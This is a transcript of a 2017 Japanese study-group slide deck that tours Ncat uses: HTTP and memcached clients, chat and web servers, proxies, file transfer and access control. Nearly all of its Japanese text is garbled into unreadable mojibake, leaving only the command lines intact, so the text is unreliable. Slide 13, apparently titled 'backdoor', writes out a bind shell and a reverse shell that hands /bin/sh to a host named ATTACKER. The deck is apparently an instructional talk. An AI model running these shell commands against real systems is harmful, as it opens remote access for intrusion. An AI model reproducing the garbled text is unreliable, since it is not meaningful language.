Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Ncatをつかおう / Use Ncat

Ncatをつかおう / Use Ncat

長岡 IT開発者 勉強会 第52回勉強会

Hayato Imai

June 17, 2017
Tweet

More Decks by Hayato Imai

Other Decks in Programming

Transcript

  1. /DBUΛ͔͓ͭ͏
    ௕Ԭ*5։ൃऀษڧձୈճษڧձ
    /FUDBU

    View Slide

  2. ࣗݾ঺հ
    w )BZBUP*NBJࠓҪ൏ਓ
    w !IBZBKP
    w Πϯϑϥ୲౰

    View Slide

  3. /FUDBU

    View Slide

  4. /FUDBUͱ͸
    w ODίϚϯυ
    w ωοτϫʔΫͷεΠεΞʔϛʔφΠϑ
    w ଟ໨తωοτϫʔΫϢʔςΟϦςΟ
    w 5$16%1ϓϩτίϧΛѻ͏
    w DBUͷωοτϫʔΫ൛

    View Slide

  5. ͍Ζ͍Ζͳ/FUDBU OD

    ΦϦδφϧ w W
    w 6CVOUV
    (/6൛ w ΦϦδφϧޓ׵ w "SDI FYUSB

    0QFO#4%൛
    w *1Wɺ6%4ରԠ
    w ίϚϯυ࣮ߦඇରԠ
    w $FOU04
    w 049
    /NBQ൛
    ʢ/DBUʣ
    w 44-ରԠɺଟػೳ w $FOU04 OD!ODBU

    CVTZCPY൛ w ΄΅(/6൛ͱಉ͡
    w #VTZ#PY
    w "MQJOF
    ࠓճ͸/NBQ൛/FUDBUͰ͋Δ/DBU ODBU
    Λ঺հ͠·͢ɻ
    IUUQTONBQPSHODBU

    View Slide

  6. /DBU ODBU
    ͷ͔͍͔ͭͨ

    View Slide

  7. ΫϥΠΞϯτ
    $ ncat -C example.com 80
    )551ΫϥΠΞϯτ
    $ ncat -C HOST 11211
    .FNDBDIFΫϥΠΞϯτ "4$**

    $ perl -e 'print "\x80\x00\x00\x05" . "\x00"x4 .
    "\x00\x00\x00\x05" . "\x00"x12 . "\x68\x65\x6c\x6c\x6f"' |\
    > ncat HOST 11211 |\
    > hexdump -C
    .FNDBDIFΫϥΠΞϯτ #*/"3:

    View Slide

  8. αʔό

    SERVER$ ncat -l --broker
    HOST1$ ncat SERVER
    HOST2$ ncat SERVER
    $IBUαʔό CSPLFS

    SERVER$ ncat -l --chat
    HOST1$ ncat SERVER
    HOST2$ ncat SERVER
    $IBUαʔό DIBU

    $IBUαʔό
    SERVER$ ncat -l # σϑΥϧτϙʔτ31337
    HOST1$ ncat SERVER

    View Slide

  9. αʔό

    SERVER$ ncat -l 8080 -k \
    > --sh-exec \
    > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html"
    CLIENT$ curl http://SERVER:8080
    8FCαʔό
    SERVER$ ncat --ssl -l 8443 -k \
    > --sh-exec \
    > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html"
    CLIENT$ curl -k https://SERVER:8443
    8FCαʔό 44-

    View Slide

  10. ϓϩΩγ

    PROXY$ ncat -l 8080 \
    > --proxy-type http --proxy-auth user:pass
    CLIENT$ curl -v https://example.com \
    > --proxy PROXY:8080 --proxy-user user:pass
    )551ϓϩΩγ
    PROXY$ ncat -l 1883 -k \
    > --sh-exec 'ncat --ssl -i 3 test.mosquitto.org 8883'
    CLIENT$ MQTT_HOST=PROXY MQTT_PORT=1883 mqttcli sub -t "#"
    ϓϩτίϧม׵ )551)5514

    PROXY$ ncat --ssl -l 8443 -k \
    > --sh-exec 'ncat -i 3 -C localhost 3000'
    CLIENT$ curl -k https://PROXY:8443
    44-Φϑϩʔυ

    View Slide

  11. ϓϩΩγ

    PROXY$ mkfifo f
    PROXY$ ncat -l 8080 -k > while true; do \
    > openssl s_client -connect example.com:443 -quiet >f 2>/dev/null; \
    > done
    ίωΫγϣϯϓʔϦϯά
    $ httpstat https://example.com/
    ...
    DNS Lookup TCP Connection TLS Handshake Server Processing Content Transfer
    [ 6ms | 96ms | 371ms | 96ms | 1ms ]
    | | | | |
    namelookup:6ms | | | |
    connect:102ms | | |
    pretransfer:473ms | |
    starttransfer:569ms |
    total:570ms
    $ httpstat http://PROXY:8080 -H 'Host: example.com'
    ...
    DNS Lookup TCP Connection Server Processing Content Transfer
    [ 5ms | 0ms | 98ms | 0ms ]
    | | | |
    namelookup:5ms | | |
    connect:5ms | |
    starttransfer:103ms |
    total:103ms

    View Slide

  12. ϑΝΠϧసૹ
    SERVER$ ncat -l 8080 --recv-only >out.file
    CLIENT$ ncat --send-only SERVER 8080 ΫϥΠΞϯταʔόసૹ
    SERVER$ ncat -l 8080 --send-only CLIENT$ ncat --recv-only SERVER 8080 >out.file
    αʔόΫϥΠΞϯτసૹ
    SERVER$ ncat --ssl -l 8080 --recv-only >out.file
    CLIENT$ ncat --ssl --send-only SERVER 8080 44-సૹ ΫϥΠΞϯταʔόసૹ

    View Slide

  13. TARGET$ ncat -l --exec /bin/sh 8080
    ATTACKER$ ncat TARGET 8080
    λʔήοτʹ௚઀ΞΫηεՄೳͳ৔߹
    ATTACKER$ ncat -l 8080
    TARGET$ ncat --exec /bin/sh ATTACKER 8080
    λʔήοτ͕/"5എޙͷ৔߹
    όοΫυΞ

    View Slide

  14. ΞΫηε੍ޚ
    $ ncat -l 8080 --allow 10.0.0.2
    ڐՄ
    $ ncat -l 8080 --deny 10.0.0.0/8
    ڋ൱
    ྆ํࢦఆͨ͠৔߹͸EFOZ͕༏ઌ͞Ε·͢ɻ

    View Slide

  15. ·ͱΊ

    View Slide

  16. ·ͱΊ
    w /FUDBUίϚϯυ͸͍͔ͭ͘ͷ࣮૷͕͋Δ
    w /DBU͸ଟػೳɺ։ൃ΋੝ΜͳͷͰ͓͢͢Ί
    w ΞΠσΞ࣍ୈͰ༷ʑͳ࢖͍ํ͕͋Δ

    View Slide